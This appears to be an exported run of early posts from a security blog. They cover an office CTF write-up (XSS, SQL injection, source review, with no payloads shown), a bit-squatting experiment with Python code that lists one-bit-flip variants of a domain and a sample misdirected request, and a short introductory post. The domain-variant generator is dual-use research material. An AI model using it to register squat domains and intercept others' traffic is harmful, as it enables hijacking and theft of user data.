After attending a local OWASP chapter conference, DA "The Boss" decided that he wanted to replicate the CTF experience for those of us on the Analysis Team at DSWRX in Providence.<br />
<br />
Here's a quick write-up of my experience as a simulated "Pentester" (a complete 180 from my normal work role).<br />
<br />
The Server was built using the latest [as of September 2012] Ubuntu Server with a typical, updated LAMP installation. All source code for the actual CTF WebApp was obtained from the previously mentioned OWASP meeting. This setup led to the first problem: the updated PHP was not vulnerable to the Metasploit module: /unix/webapp/php_eval, and thus one of the 12 Flags was not obtainable. 11 to go!<br />
<br />
I only looked at the actual webpage, a domain provided by a co-worker, once, to look for potentially injectable parameters. Since I had not previously taken part in a scenario like this, I wanted to experiment with some of the tools packaged with the excellent BackTrack 5r3.<br />
<br />
I started up my local BackTrack, logged into a not-at-all suspicious VPN, and fired up Burp (free edition) to start mapping the entire website. Immediately I saw that the usual "test.php" page was still enabled, which typically provides a verbose listing of server and application configuration. I mentioned this to "The Boss" eventually and it was then disabled. Following that, I found the first flag using a relatively simple XSS. The second flag quickly followed as I was browsing through the completed spider report and found a URI for "flag" (a text file in /var/www/). Having exhausted the obvious options, it was time to start reading the source code!<br />
<br />
From a quick review of the source, I was able to find an additional flag (#3), hard-coded default MySQL credentials, and a parameter to test for SQLi. After a quick test it was pretty clear that the "id" parameter was vulnerable to SQLi, and so, after some useless spamming of the webpage with w3af, it was time to get down to business.Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-60981593801514951302012-11-12T14:23:00.000-08:002012-12-06T20:00:40.819-08:00Why this domain?I originally registered this domain back in 2011, shortly after this talk was released:<br />
<a href="http://www.blackhat.com/html/bh-us-11/bh-us-11-archives.html">http://www.blackhat.com/html/bh-us-11/bh-us-11-archives.html</a><br />
"Bit-squatting: DNS Hijacking without exploitation"<br />
<br />
It intrigued me and I attempted to duplicate the results of this experiment. micrmsoft.com was one of several domains I registered. I got some variants of paypal, mozilla, and facebook domains as well, but the microsoft variants yielded the most misdirected requests. My conclusion was ultimately that the author of the original talk was not full of BS, and traffic to microsoft was high enough that there would be some misdirected requests going to the domain. The paypal, mozilla, and facebook domains did not perform nearly as well.<br />
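Picking the domains to register is the mechanical part of the experiment: take the target name and enumerate every hostname that differs from it by exactly one bit in one character, keeping only the ones that are still legal DNS labels. micrmsoft.com is microsoft.com with bit 1 of the "o" (0x6F) flipped to give "m" (0x6D). The snippet below is example code I've added, not the talk's or this blog's tooling; it only mutates the second-level label, since the variants registered here kept the original TLD.<br />

```python
"""Enumerate the single-bit-flip neighbours of a domain, as the bit-squatting
talk describes, and check that micrmsoft.com is one of them.

Added example, not the talk's or the blog's code.  Only flips that leave
a character legal in a DNS label (a-z, 0-9, '-') are kept, and only the
second-level label is mutated, since the registered variants kept the
original TLD.
"""
import string

LABEL_CHARS = set(string.ascii_lowercase + string.digits + "-")


def bitflip_neighbours(domain):
    """Hostnames reachable from `domain` by flipping exactly one bit in one
    character of the second-level label, keeping only valid labels."""
    sld, _, tld = domain.lower().rpartition(".")
    out = set()
    for i, ch in enumerate(sld):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped not in LABEL_CHARS:
                continue          # e.g. an uppercase letter (same name to DNS) or a control byte
            label = sld[:i] + flipped + sld[i + 1:]
            if label.startswith("-") or label.endswith("-"):
                continue          # labels may not begin or end with a hyphen
            out.add(label + "." + tld)
    return out


def flipped_bit(original, variant):
    """(index, bit) of the single differing bit, or None if the two names do
    not differ by exactly one bit.  Useful for triaging a log of squat hits."""
    if len(original) != len(variant):
        return None
    diffs = [(i, ord(a) ^ ord(b))
             for i, (a, b) in enumerate(zip(original, variant)) if a != b]
    if len(diffs) != 1:
        return None
    i, x = diffs[0]
    if x & (x - 1):               # more than one bit set in this byte
        return None
    return i, x.bit_length() - 1


if __name__ == "__main__":
    for name in sorted(bitflip_neighbours("microsoft.com")):
        print(name, flipped_bit("microsoft.com", name))
```

The same list is what a defender registers (or at least monitors) for their own brand, and flipped_bit is the quick check for whether an odd hostname in your logs is a squat or just a typo.<br />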
<br />
Here's a small example pcap from a day of traffic:<br />
<a href="http://micrmsoft.com/smallsample.pcap">http://micrmsoft.com/smallsample.pcap</a><br />
<br />
example request:<br />
<br />
GET /pki/certs/MicrosoftWinIntPCA.crt HTTP/1.1<br />
Accept: */*<br />
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br />
Host: www.micrmsoft.com<br />
Connection: Keep-Alive<br />
<br />
<br />
You can see that the vast majority of those requests are from crawlers, but occasionally you'll see a Microsoft CryptoAPI client requesting certificates. I think this bit-flip stuff is really only a concern for the top handful of domains in the world, but it was interesting to see a tiny slice of what Microsoft sees. <br />
<br />
Could this be used for evil? Perhaps it could be used to MITM some poor soul's failing hardware. We only monitored passively and did not see any personal information. After the misdirected requests for certificates were given 404 errors, the errant IPs did not come back.<br />
<br />
Edit: This was recently released, and the original author discusses much more in depth information on the subject: http://blog.dinaburg.org/2012/10/a-preview-of-bitsquatting-pcaps.htmlAllison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-12972120646675610232012-11-12T12:41:00.001-08:002012-12-06T20:00:40.816-08:00First post!!!!This is the first post of our blog. This blog is to document shenanigans and whatever interesting discoveries. Current contributors are Allison Nixon(@nixonnixoff) and Brandon Levene(@SeraphimDomain).<br />
<br />
First content, here's a link to a Sophos puzzle that we won: <a href="http://nakedsecurity.sophos.com/2012/11/05/wall-of-fame-for-skyfall-sophospuzzle/">http://nakedsecurity.sophos.com/2012/11/05/wall-of-fame-for-skyfall-sophospuzzle/</a><br />
<br />
The challenge was pretty tough, and involved several puzzles as well as cracking a variant of the Vigenère cipher. But we managed to submit answers in time to get t-shirts. Hooray for us!Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0